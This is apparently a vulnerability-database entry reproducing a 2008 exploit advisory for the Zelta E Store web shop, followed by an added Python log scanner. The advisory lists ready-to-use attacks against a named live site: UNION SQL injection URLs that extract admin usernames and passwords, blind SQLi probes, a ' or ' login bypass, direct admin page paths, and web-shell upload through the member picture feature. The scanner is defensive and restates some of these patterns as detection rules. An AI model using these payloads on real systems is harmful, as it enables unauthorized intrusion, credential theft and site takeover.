Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection

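Vulnerability ID: 1057035
Vulnerability type:
Published: 2008-12-16
Updated: 2008-12-16
CVE ID: N/A
CNNVD-ID: N/A
Platform: PHP
CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/7494
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit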
[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns. 
[~]
[~] script: http://www.zeltatrade.com/
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Date: 16/12/2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo 
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~] -----------------------------------------------------------

exp for demo: (R-SQL)

user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin

pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin


exp for demo: (B-SQL)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)


exp for demo: (auth bypass)

http://joineazy.com/members/login.asp

username: trt-turk@hotmail.com

pass: ' or '


exp for demo: (admin bypass)

http://joineazy.com/embadmin/admin_main.asp

http://joineazy.com/embadmin/site_setup.asp

http://joineazy.com/embadmin/main_baseimage.asp


exp for demo: (RFU)

first, register on the site

log in to the site, edit your pictures, and select your shell.asp

go to your shell.asp:

http://joineazy.com/members/member_pictures/shell.asp

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-12-16]
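
A defender's view of three of the request patterns listed above (the category_id injection, the /embadmin/ pages and scripts under member_pictures), as an added example that is not part of the original advisory or the vendor's code: a small Python scanner that flags them in web-server logs. The simplified log layout, the sample lines, the integer-only assumption for category_id and the script-extension list are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in a simplified layout: method, URI stem, query, status.
SAMPLE_LOG = """\
GET /store/productsofcat.asp p=1&category_id=17 200
GET /store/productsofcat.asp p=1&category_id=17+and+1=1 200
GET /store/productsofcat.asp p=1&category_id=17+union+select+1,2,3,4 200
GET /embadmin/site_setup.asp - 200
POST /members/login.asp - 302
GET /members/member_pictures/photo1.jpg - 200
GET /members/member_pictures/upload.ASP - 200
"""

# Assumed list of extensions the server maps to a script handler; adjust to the site.
SCRIPT_EXT = re.compile(r"\.(asp|asa|cer|cdx|aspx)$", re.IGNORECASE)

def classify(stem, query):
    """Return findings for one request, given its URI stem and raw query string."""
    path = unquote(stem).lower()  # IIS paths are case-insensitive
    findings = []
    if path.endswith("/productsofcat.asp"):
        params = parse_qs("" if query == "-" else query, keep_blank_values=True)
        # Assumption: category_id is a plain integer key, as in the page's URLs.
        if any(not re.fullmatch(r"[0-9]+", v) for v in params.get("category_id", [])):
            findings.append("non-numeric category_id")
    if path.startswith("/embadmin/"):
        # Logs cannot show session state, so every admin request is listed for review.
        findings.append("admin page request")
    if path.startswith("/members/member_pictures/") and SCRIPT_EXT.search(path):
        findings.append("script requested from upload directory")
    return findings

def scan(log_text):
    """Return (line_number, stem, findings) for every flagged log line."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed or comment lines
        _method, stem, query, _status = fields
        findings = classify(stem, query)
        if findings:
            hits.append((number, stem, findings))
    return hits

if __name__ == "__main__":
    for number, stem, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {stem}: {', '.join(findings)}")
```

The login bypass is not covered here because the submitted password travels in the POST body, which access logs of this kind do not record.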